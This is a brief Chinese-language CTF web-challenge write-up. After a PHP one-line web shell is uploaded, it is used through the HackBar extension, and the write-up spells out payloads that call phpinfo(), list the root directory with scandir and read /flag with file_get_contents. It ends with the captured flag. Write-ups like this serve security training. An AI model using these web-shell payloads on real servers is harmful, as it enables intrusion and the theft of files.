ctf中web的一道题

1、进行一句话马上传成功之后

f12打开hack_bar

一句话马,不用蚁剑连接、通过hack_bar连接_ctf


cmd(一句话马所传入设置的密码)=phpinfo(); 查看被禁用掉的函数

看了下被禁用的函数,发现还是可以进行目标浏览和文件读取

2、查找根目录,利用var_dump()打印、scandir()查找函数

cmd=var_dump(scandir('/'));

一句话马,不用蚁剑连接、通过hack_bar连接_ctf_02

发现根目录下存在flag

3、读取目标文件下、并打印出来file_get_contents();获取目标文件

cmd=var_dump(file_get_contents('/flag'));

一句话马,不用蚁剑连接、通过hack_bar连接_ctf_03

得到flag:flag{3252054f-bd05-453a-acc8-a252b4eaaee6}